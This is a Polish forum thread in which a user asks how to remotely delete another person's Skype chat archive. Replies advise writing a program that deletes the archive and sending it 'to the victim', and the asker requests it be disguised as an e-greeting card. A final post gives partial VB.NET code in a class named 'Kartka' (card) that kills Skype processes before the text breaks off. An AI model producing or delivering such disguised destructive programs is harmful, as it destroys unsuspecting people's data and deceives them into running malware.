Jak usunąć z innego komputera archiwum Skype?

xgss

Użytkownik
Dołączył
Sierpień 16, 2013
Posty
6
Jak w temacie. Potrzebuje pomocy, jak mogę zdalnie usunąć komus archiwum czatu skype? Z góry dziekuje za odpowiedzi.
 

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
Napisz program w C++:

-Pobierz ścieżke bezwzględną archiwum Skype na dysku
-Usuń

Teraz wyślij ofierze i tyle. Roboty na 10 minut.
 

xgss

Użytkownik
Dołączył
Sierpień 16, 2013
Posty
6
Jestem zielony w programowaniu. Czy mógłbyś Kolego pomóc mi w tym temacie?


Czy ktoś mógłby mi pomóc? Ewentualnie po ustaleniu zadośćuczynienia, podrzucić mi gotowy program?
 
Ostatnia edycja:

Dark Smark

Były Moderator
Dołączył
Kwiecień 29, 2006
Posty
1953
A jaki ta osoba ma system operacyjny czy wiesz i czy masz możliwość jej wysłać ten program by ona go uruchomiła?
 

xgss

Użytkownik
Dołączył
Sierpień 16, 2013
Posty
6
System to napewno Windows tylko nie wiem który. Mam możliwość podesłania programu. A czy go uruchomi to juz loteria.
 

xgss

Użytkownik
Dołączył
Sierpień 16, 2013
Posty
6
Witam. Kto podjąłby się stworzenia dla mnie takiego programu? Ewentualnie zamaskowany pod np. jakąś e-kartką z życzeniami.. Bardzo zależy mi na czasie dlatego proszę o szybką odpowiedź. Pozdrawiam!
 

barukoru

Użytkownik
Dołączył
Marzec 12, 2011
Posty
80
Coż......Kilka dni temu podałem link do gotowego programu ale został usunięty przez administrację gdyż brak było kodu zródlowego.Jak usunąć archiwum skypa?Proszę bardzo:
Imports System.IO
Public Class Kartka


''baru skype usuwacz,hahhahah'''
Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load
Dim pProcess() As Process = System.Diagnostics.Process.GetProcessesByName("Skype")
For Each p As Process In pProcess
p.Kill()
Dim Present As Date
Dim DelayTime As Integer = 15 'Secounds
Present = Now
Do Until DateDiff(Microsoft.VisualBasic.DateInterval.Second, Present, Now) > DelayTime
Loop
Next